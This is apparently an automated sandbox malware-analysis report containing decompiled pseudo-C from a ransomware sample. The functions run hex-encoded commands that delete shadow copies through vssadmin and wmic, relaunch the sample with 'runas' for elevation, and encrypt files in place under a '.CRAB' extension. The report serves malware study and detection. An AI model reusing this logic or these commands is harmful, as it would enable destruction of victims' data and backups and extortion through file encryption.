                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
                                    • String ID:
                                    • API String ID: 2885909284-0
                                    • Opcode ID: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
                                    • Instruction ID: a83d69dc5258653c6a042d178f46c16b156452a6d42c6daa0fb1e0cc63240257
                                    • Opcode Fuzzy Hash: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
                                    • Instruction Fuzzy Hash: D821A571A413197FEB11AB64CC81F9ABFECEF49B50F100065F644F7281D7B56A128B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F5845B0(void* __eflags) {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				char _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char _v120;
                                    				short _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				intOrPtr _v140;
                                    				intOrPtr _v144;
                                    				intOrPtr _v148;
                                    				char _v152;
                                    				short _v156;
                                    				intOrPtr _v160;
                                    				intOrPtr _v164;
                                    				intOrPtr _v168;
                                    				char _v172;
                                    				short* _v176;
                                    				short* _t51;
                                    				WCHAR* _t59;
                                    				void* _t62;
                                    				signed int _t66;
                                    				void* _t69;
                                    
                                    				if(E0F583CF0(_t62) == 0) {
                                    					_v172 = 0x63005c;
                                    					_v168 = 0x64006d;
                                    					_v8 = 0;
                                    					_t59 =  &_v172;
                                    					_v164 = 0x65002e;
                                    					_t51 =  &_v84;
                                    					_v160 = 0x650078;
                                    					_v156 = 0;
                                    					_v84 = 0x63002f;
                                    					_v80 = 0x760020;
                                    					_v76 = 0x730073;
                                    					_v72 = 0x640061;
                                    					_v68 = 0x69006d;
                                    					_v64 = 0x20006e;
                                    					_v60 = 0x650064;
                                    					_v56 = 0x65006c;
                                    					_v52 = 0x650074;
                                    					_v48 = 0x730020;
                                    					_v44 = 0x610068;
                                    					_v40 = 0x6f0064;
                                    					_v36 = 0x730077;
                                    					_v32 = 0x2f0020;
                                    					_v28 = 0x6c0061;
                                    					_v24 = 0x20006c;
                                    					_v20 = 0x71002f;
                                    					_v16 = 0x690075;
                                    					_v12 = 0x740065;
                                    				} else {
                                    					_v152 = 0x77005c;
                                    					_v148 = 0x650062;
                                    					_t59 =  &_v152;
                                    					_v144 = 0x5c006d;
                                    					_t51 =  &_v120;
                                    					_v140 = 0x6d0077;
                                    					_v136 = 0x630069;
                                    					_v132 = 0x65002e;
                                    					_v128 = 0x650078;
                                    					_v124 = 0;
                                    					_v120 = 0x680073;
                                    					_v116 = 0x640061;
                                    					_v112 = 0x77006f;
                                    					_v108 = 0x6f0063;
                                    					_v104 = 0x790070;
                                    					_v100 = 0x640020;
                                    					_v96 = 0x6c0065;
                                    					_v92 = 0x740065;
                                    					_v88 = 0x65;
                                    				}
                                    				_v176 = _t51;
                                    				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                    				if(_t69 != 0) {
                                    					GetSystemDirectoryW(_t69, 0x100);
                                    					lstrcatW(_t69, _t59);
                                    					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                    					asm("sbb edi, edi");
                                    					_t66 =  ~0x20;
                                    				} else {
                                    					_t66 = 0;
                                    				}
                                    				VirtualFree(_t69, 0, 0x8000);
                                    				return _t66;
                                    			}



















































                                    0x0f5845c6
                                    0x0f584662
                                    0x0f58466c
                                    0x0f584674
                                    0x0f58467c
                                    0x0f584680
                                    0x0f584688
                                    0x0f58468c
                                    0x0f584694
                                    0x0f584699
                                    0x0f5846a1
                                    0x0f5846a9
                                    0x0f5846b1
                                    0x0f5846b9
                                    0x0f5846c1
                                    0x0f5846c9
                                    0x0f5846d4
                                    0x0f5846df
                                    0x0f5846ea
                                    0x0f5846f5
                                    0x0f584700
                                    0x0f58470b
                                    0x0f584716
                                    0x0f584721
                                    0x0f58472c
                                    0x0f584737
                                    0x0f584742
                                    0x0f58474d
                                    0x0f5845cc
                                    0x0f5845ce
                                    0x0f5845d6
                                    0x0f5845de
                                    0x0f5845e2
                                    0x0f5845ea
                                    0x0f5845ee
                                    0x0f5845f6
                                    0x0f5845fe
                                    0x0f584606
                                    0x0f58460e
                                    0x0f584613
                                    0x0f58461b
                                    0x0f584623
                                    0x0f58462b
                                    0x0f584633
                                    0x0f58463b
                                    0x0f584643
                                    0x0f58464b
                                    0x0f584653
                                    0x0f584653
                                    0x0f584766
                                    0x0f584775
                                    0x0f584779
                                    0x0f584785
                                    0x0f58478d
                                    0x0f5847a3
                                    0x0f5847ab
                                    0x0f5847ad
                                    0x0f58477b
                                    0x0f58477b
                                    0x0f58477b
                                    0x0f5847b7
                                    0x0f5847c5

                                    APIs
                                      • Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 0F583D66
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6A
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6E
                                      • Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32 ref: 0F583D95
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F58476F
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F584785
                                    • lstrcatW.KERNEL32 ref: 0F58478D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F5847A3
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5847B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                    • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                    • API String ID: 2684037697-4098772853
                                    • Opcode ID: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
                                    • Instruction ID: fb37b0ca9acd9cf7a391135b8aef121d0ef4e56d2813acd1580c48b63c9d3d27
                                    • Opcode Fuzzy Hash: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
                                    • Instruction Fuzzy Hash: 294148B0108380DFE320DF218948B5BBFE2BB85B49F10491DEA985A291C7F6854DCF97
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F583DB0(void* __ecx, void* __edx, void* __eflags) {
                                    				char _v1020;
                                    				short _v1028;
                                    				char _v1532;
                                    				short _v1540;
                                    				intOrPtr _v1548;
                                    				intOrPtr _v1552;
                                    				intOrPtr _v1556;
                                    				intOrPtr _v1560;
                                    				intOrPtr _v1564;
                                    				intOrPtr _v1568;
                                    				intOrPtr _v1572;
                                    				intOrPtr _v1576;
                                    				intOrPtr _v1580;
                                    				intOrPtr _v1584;
                                    				intOrPtr _v1588;
                                    				intOrPtr _v1592;
                                    				intOrPtr _v1596;
                                    				intOrPtr _v1600;
                                    				intOrPtr _v1604;
                                    				intOrPtr _v1608;
                                    				intOrPtr _v1612;
                                    				intOrPtr _v1616;
                                    				short _v1620;
                                    				intOrPtr _v1624;
                                    				intOrPtr _v1628;
                                    				intOrPtr _v1632;
                                    				intOrPtr _v1636;
                                    				intOrPtr _v1640;
                                    				intOrPtr _v1644;
                                    				intOrPtr _v1648;
                                    				intOrPtr _v1652;
                                    				intOrPtr _v1656;
                                    				intOrPtr _v1660;
                                    				intOrPtr _v1664;
                                    				intOrPtr _v1668;
                                    				intOrPtr _v1672;
                                    				short _v1676;
                                    				char _v1680;
                                    				int _t54;
                                    				struct HWND__* _t62;
                                    				long _t66;
                                    				void* _t76;
                                    				void* _t78;
                                    				void* _t80;
                                    
                                    				_t78 = __ecx;
                                    				_t54 = E0F583CF0(__edx);
                                    				if(_t54 != 0) {
                                    					_t54 = E0F583C70();
                                    					if(_t54 == 0) {
                                    						_v1676 = 0x770025;
                                    						_v1672 = 0x6e0069;
                                    						_v1668 = 0x690064;
                                    						_v1664 = 0x250072;
                                    						_v1660 = 0x73005c;
                                    						_v1656 = 0x730079;
                                    						_v1652 = 0x650074;
                                    						_v1648 = 0x33006d;
                                    						_v1644 = 0x5c0032;
                                    						_v1640 = 0x620077;
                                    						_v1636 = 0x6d0065;
                                    						_v1632 = 0x77005c;
                                    						_v1628 = 0x69006d;
                                    						_v1624 = 0x63;
                                    						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                    						_v1620 = 0x720070;
                                    						_v1616 = 0x63006f;
                                    						_v1612 = 0x730065;
                                    						_v1608 = 0x200073;
                                    						_v1604 = 0x610063;
                                    						_v1600 = 0x6c006c;
                                    						_v1596 = 0x630020;
                                    						_v1592 = 0x650072;
                                    						_v1588 = 0x740061;
                                    						_v1584 = 0x200065;
                                    						_v1580 = 0x630022;
                                    						_v1576 = 0x64006d;
                                    						_v1572 = 0x2f0020;
                                    						_v1568 = 0x200063;
                                    						_v1564 = 0x740073;
                                    						_v1560 = 0x720061;
                                    						_v1556 = 0x200074;
                                    						_v1552 = 0x730025;
                                    						_v1548 = 0x22;
                                    						wsprintfW( &_v1028,  &_v1620, _t78);
                                    						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                    						 *_t76 = 0x3c;
                                    						 *(_t76 + 4) = 0x40;
                                    						_t62 = GetForegroundWindow();
                                    						_t80 = 0;
                                    						 *(_t76 + 8) = _t62;
                                    						_v1680 = 0x750072;
                                    						_v1676 = 0x61006e;
                                    						_v1672 = 0x73;
                                    						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
                                    						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
                                    						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
                                    						 *(_t76 + 0x18) = 0;
                                    						 *(_t76 + 0x1c) = 0;
                                    						 *(_t76 + 0x20) = 0;
                                    						while(1) {
                                    							_t66 = ShellExecuteExW(_t76);
                                    							if(_t66 != 0) {
                                    								break;
                                    							}
                                    							_t80 = _t80 + 1;
                                    							if(_t80 < 0x64) {
                                    								continue;
                                    							}
                                    							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                    							goto L6;
                                    						}
                                    						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                    						CloseHandle( *(_t76 + 0x38));
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				L6:
                                    				return _t54;
                                    			}















































                                    0x0f583dbf
                                    0x0f583dc1
                                    0x0f583dc8
                                    0x0f583dce
                                    0x0f583dd5
                                    0x0f583de7
                                    0x0f583df4
                                    0x0f583dfd
                                    0x0f583e05
                                    0x0f583e0d
                                    0x0f583e15
                                    0x0f583e1d
                                    0x0f583e25
                                    0x0f583e2d
                                    0x0f583e35
                                    0x0f583e3d
                                    0x0f583e45
                                    0x0f583e4d
                                    0x0f583e55
                                    0x0f583e5d
                                    0x0f583e68
                                    0x0f583e78
                                    0x0f583e81
                                    0x0f583e89
                                    0x0f583e91
                                    0x0f583e99
                                    0x0f583ea1
                                    0x0f583ea9
                                    0x0f583eb1
                                    0x0f583eb9
                                    0x0f583ec4
                                    0x0f583ecf
                                    0x0f583eda
                                    0x0f583ee5
                                    0x0f583ef0
                                    0x0f583efb
                                    0x0f583f06
                                    0x0f583f11
                                    0x0f583f1c
                                    0x0f583f27
                                    0x0f583f41
                                    0x0f583f43
                                    0x0f583f49
                                    0x0f583f50
                                    0x0f583f5c
                                    0x0f583f5e
                                    0x0f583f65
                                    0x0f583f6d
                                    0x0f583f75
                                    0x0f583f7d
                                    0x0f583f87
                                    0x0f583f91
                                    0x0f583f94
                                    0x0f583f9b
                                    0x0f583fa2
                                    0x0f583fb0
                                    0x0f583fb1
                                    0x0f583fb5
                                    0x00000000
                                    0x00000000
                                    0x0f583fb7
                                    0x0f583fbb
                                    0x00000000
                                    0x00000000
                                    0x0f583fc4
                                    0x00000000
                                    0x0f583fc4
                                    0x0f583fd6
                                    0x0f583fdf
                                    0x0f583fe7
                                    0x0f583fe7
                                    0x0f583dd5
                                    0x0f583fca
                                    0x0f583fd0

                                    APIs
                                      • Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 0F583D66
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6A
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6E
                                      • Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32 ref: 0F583D95
                                      • Part of subcall function 0F583C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0
                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F583E5D
                                    • wsprintfW.USER32 ref: 0F583F27
                                    • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F583F3B
                                    • GetForegroundWindow.USER32 ref: 0F583F50
                                    • ShellExecuteExW.SHELL32(00000000), ref: 0F583FB1
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F583FC4
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F583FD6
                                    • CloseHandle.KERNEL32(?), ref: 0F583FDF
                                    • ExitProcess.KERNEL32 ref: 0F583FE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                    • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                    • API String ID: 561366689-3790645798
                                    • Opcode ID: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
                                    • Instruction ID: f084ac1c31428ad25061de51693550b6d875a6523ef945250586e709d6c8e080
                                    • Opcode Fuzzy Hash: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
                                    • Instruction Fuzzy Hash: DD5157B0008341EFE3208F10C548B9ABFF9BF84759F004A2DE6989A251D7FA915DCF92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E0F5837B0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                    				long _v8;
                                    				void* _v12;
                                    				long _v16;
                                    				long _v20;
                                    				void* _v24;
                                    				void* _v28;
                                    				long _v32;
                                    				long _v36;
                                    				void _v40;
                                    				void _v44;
                                    				signed int _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				void* _v60;
                                    				void* _v64;
                                    				void* _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				short _v80;
                                    				int _v84;
                                    				char _v88;
                                    				char _v104;
                                    				char _v108;
                                    				char _v140;
                                    				char _v388;
                                    				void* _t96;
                                    				void* _t97;
                                    				struct HWND__* _t99;
                                    				void* _t101;
                                    				void* _t107;
                                    				long _t124;
                                    				long _t125;
                                    				long _t128;
                                    				WCHAR* _t145;
                                    				void* _t147;
                                    				void* _t149;
                                    				void* _t151;
                                    				WCHAR* _t162;
                                    				void* _t163;
                                    				void* _t164;
                                    				void _t165;
                                    				void* _t166;
                                    				long _t168;
                                    				void* _t173;
                                    				void* _t175;
                                    				void* _t176;
                                    				void* _t177;
                                    
                                    				_t145 = __ecx;
                                    				_t166 = __edx;
                                    				_v52 = __ecx;
                                    				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
                                    				_v20 = 0;
                                    				_v32 = 0;
                                    				_t151 = _t166;
                                    				E0F586500(_t151, 0, 0,  &_v20,  &_v32);
                                    				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                    				_v80 = 0x43002e;
                                    				_v56 = _t162;
                                    				_v76 = 0x410052;
                                    				_v72 = 0x42;
                                    				lstrcpyW(_t162, _t145);
                                    				lstrcatW(_t162,  &_v80);
                                    				asm("movdqa xmm0, [0xf590530]");
                                    				asm("movdqu [ebp-0x88], xmm0");
                                    				_push(_t151);
                                    				asm("movdqa xmm0, [0xf590530]");
                                    				asm("movdqu [ebp-0x78], xmm0");
                                    				_v108 = 0;
                                    				asm("movdqa xmm0, [0xf590530]");
                                    				asm("movdqu [ebp-0x64], xmm0");
                                    				E0F588400( &_v104, 0x10);
                                    				E0F588400( &_v140, 0x20);
                                    				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                    				asm("movdqu xmm0, [ebp-0x88]");
                                    				asm("movdqu [ebx], xmm0");
                                    				asm("movdqu xmm0, [ebp-0x78]");
                                    				_v24 = _t96;
                                    				asm("movdqu [ebx+0x10], xmm0");
                                    				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                    				asm("movdqu xmm0, [ebp-0x64]");
                                    				_t163 = _t97;
                                    				_v60 = _t163;
                                    				asm("movdqu [edi], xmm0");
                                    				_v88 = 0x20;
                                    				_v84 = 0x10;
                                    				_t99 = E0F586660(_v20, _v32, _t96,  &_v88, 0x800);
                                    				_t175 = _t173 + 0x18;
                                    				if(_t99 != 0) {
                                    					_t101 = E0F586660(_v20, _v32, _t163,  &_v84, 0x800);
                                    					_t176 = _t175 + 0x14;
                                    					if(_t101 != 0) {
                                    						E0F588520( &_v140,  &_v388);
                                    						_t177 = _t176 + 8;
                                    						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                    						_v28 = _t147;
                                    						if(_t147 != 0xffffffff) {
                                    							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
                                    							 *_t164 = 0;
                                    							 *(_t164 + 4) = 0;
                                    							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                    							_t168 = 0;
                                    							_v12 = _t107;
                                    							_v36 = 0;
                                    							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
                                    								_t124 = _v8;
                                    								if(_t124 != 0) {
                                    									_t149 = 0;
                                    									_v64 = 0;
                                    									_t168 =  <  ? 1 : _t168;
                                    									 *_t164 =  *_t164 + _t124;
                                    									asm("adc [edi+0x4], ebx");
                                    									_t125 = _v8;
                                    									_v48 = _t125;
                                    									if((_t125 & 0x0000000f) != 0) {
                                    										do {
                                    											_t125 = _t125 + 1;
                                    										} while ((_t125 & 0x0000000f) != 0);
                                    										_v8 = _t125;
                                    									}
                                    									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
                                    									E0F588B20(_t126, _v12, _v48);
                                    									_t128 = _v8;
                                    									_t177 = _t177 + 0xc;
                                    									_v40 = _t128;
                                    									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
                                    										E0F5836D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
                                    										_t149 = _v64;
                                    										_t177 = _t177 + 0x10;
                                    									}
                                    									VirtualFree(_v68, 0, 0x8000);
                                    									SetFilePointer(_v28,  ~_v48, 0, 1);
                                    									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
                                    										_t168 = 1;
                                    										_v36 = 1;
                                    									}
                                    									VirtualFree(_t149, 0, 0x8000);
                                    									_t147 = _v28;
                                    									if(_t168 == 0) {
                                    										_t107 = _v12;
                                    										continue;
                                    									}
                                    								}
                                    								break;
                                    							}
                                    							VirtualFree(_v12, 0, 0x8000);
                                    							if(_v36 == 0) {
                                    								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
                                    								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
                                    								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
                                    							}
                                    							CloseHandle(_t147);
                                    							_v40 =  *_t164;
                                    							VirtualFree(_t164, 0, 0x8000);
                                    							VirtualFree(_v24, 0, 0x8000);
                                    							VirtualFree(_v60, 0, 0x8000);
                                    							if(_v36 == 0) {
                                    								MoveFileW(_v52, _v56);
                                    							}
                                    							_t165 = _v40;
                                    						} else {
                                    							VirtualFree(_t163, 0, 0x8000);
                                    							VirtualFree(_v24, 0, 0x8000);
                                    							asm("xorps xmm0, xmm0");
                                    							asm("movlpd [ebp-0x28], xmm0");
                                    							_t165 = _v44;
                                    						}
                                    					} else {
                                    						GetLastError();
                                    						asm("xorps xmm0, xmm0");
                                    						asm("movlpd [ebp-0x28], xmm0");
                                    						_t165 = _v44;
                                    					}
                                    				} else {
                                    					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
                                    					asm("xorps xmm0, xmm0");
                                    					asm("movlpd [ebp-0x28], xmm0");
                                    					_t165 = _v44;
                                    				}
                                    				VirtualFree(_v56, 0, 0x8000);
                                    				return _t165;
                                    			}


















































                                    0x0f5837bb
                                    0x0f5837bd
                                    0x0f5837c1
                                    0x0f5837cf
                                    0x0f5837d8
                                    0x0f5837e3
                                    0x0f5837ef
                                    0x0f5837f1
                                    0x0f58380c
                                    0x0f58380e
                                    0x0f583817
                                    0x0f58381a
                                    0x0f583821
                                    0x0f583828
                                    0x0f583833
                                    0x0f583839
                                    0x0f583846
                                    0x0f58384e
                                    0x0f58384f
                                    0x0f58385a
                                    0x0f58385f
                                    0x0f583863
                                    0x0f58386b
                                    0x0f583870
                                    0x0f583880
                                    0x0f583896
                                    0x0f583898
                                    0x0f5838ae
                                    0x0f5838b4
                                    0x0f5838b9
                                    0x0f5838bc
                                    0x0f5838c1
                                    0x0f5838c3
                                    0x0f5838c8
                                    0x0f5838d3
                                    0x0f5838d6
                                    0x0f5838da
                                    0x0f5838e1
                                    0x0f5838ef
                                    0x0f5838f4
                                    0x0f5838f9
                                    0x0f583937
                                    0x0f58393c
                                    0x0f583941
                                    0x0f583970
                                    0x0f583975
                                    0x0f583993
                                    0x0f583995
                                    0x0f58399b
                                    0x0f5839db
                                    0x0f5839e9
                                    0x0f5839ef
                                    0x0f5839f6
                                    0x0f5839f8
                                    0x0f5839fa
                                    0x0f5839fd
                                    0x0f583a05
                                    0x0f583a20
                                    0x0f583a25
                                    0x0f583a2b
                                    0x0f583a37
                                    0x0f583a3a
                                    0x0f583a3d
                                    0x0f583a3f
                                    0x0f583a42
                                    0x0f583a45
                                    0x0f583a4a
                                    0x0f583a50
                                    0x0f583a50
                                    0x0f583a51
                                    0x0f583a55
                                    0x0f583a55
                                    0x0f583a6b
                                    0x0f583a72
                                    0x0f583a77
                                    0x0f583a7a
                                    0x0f583a7d
                                    0x0f583a92
                                    0x0f583aaa
                                    0x0f583aaf
                                    0x0f583ab2
                                    0x0f583ab2
                                    0x0f583abf
                                    0x0f583ad2
                                    0x0f583aed
                                    0x0f583aef
                                    0x0f583af4
                                    0x0f583af4
                                    0x0f583aff
                                    0x0f583b05
                                    0x0f583b0a
                                    0x0f583a02
                                    0x00000000
                                    0x0f583a02
                                    0x0f583b0a
                                    0x00000000
                                    0x0f583a25
                                    0x0f583b20
                                    0x0f583b26
                                    0x0f583b37
                                    0x0f583b4c
                                    0x0f583b5c
                                    0x0f583b5c
                                    0x0f583b63
                                    0x0f583b76
                                    0x0f583b79
                                    0x0f583b85
                                    0x0f583b91
                                    0x0f583b97
                                    0x0f583b9f
                                    0x0f583b9f
                                    0x0f583ba5
                                    0x0f58399d
                                    0x0f5839ab
                                    0x0f5839b7
                                    0x0f5839b9
                                    0x0f5839bc
                                    0x0f5839c4
                                    0x0f5839c4
                                    0x0f583943
                                    0x0f583943
                                    0x0f58394f
                                    0x0f583952
                                    0x0f58395a
                                    0x0f58395a
                                    0x0f5838fb
                                    0x0f583908
                                    0x0f583914
                                    0x0f583917
                                    0x0f58391f
                                    0x0f58391f
                                    0x0f583bb2
                                    0x0f583bbe

                                    APIs
                                    • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F5837C4
                                    • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F5837CF
                                    • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F58380A
                                    • lstrcpyW.KERNEL32 ref: 0F583828
                                    • lstrcatW.KERNEL32 ref: 0F583833
                                      • Part of subcall function 0F588400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F588420
                                      • Part of subcall function 0F588400: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F588448
                                      • Part of subcall function 0F588400: GetModuleHandleA.KERNEL32(?), ref: 0F58849D
                                      • Part of subcall function 0F588400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F5884AB
                                      • Part of subcall function 0F588400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F5884BA
                                      • Part of subcall function 0F588400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5884DE
                                      • Part of subcall function 0F588400: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5884EC
                                      • Part of subcall function 0F588400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F588500
                                      • Part of subcall function 0F588400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F58850E
                                    • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F583896
                                    • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F5838C1
                                      • Part of subcall function 0F586660: EnterCriticalSection.KERNEL32(0F592A48,?,0F5838F4,00000000,00000000,00000000,?,00000800), ref: 0F58666B
                                      • Part of subcall function 0F586660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F5838F4,00000000,00000000,00000000), ref: 0F586691
                                      • Part of subcall function 0F586660: GetLastError.KERNEL32(?,0F5838F4,00000000,00000000,00000000), ref: 0F58669B
                                      • Part of subcall function 0F586660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F5838F4,00000000,00000000,00000000), ref: 0F5866B7
                                    • MessageBoxA.USER32 ref: 0F583908
                                    • GetLastError.KERNEL32 ref: 0F583943
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F583BB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
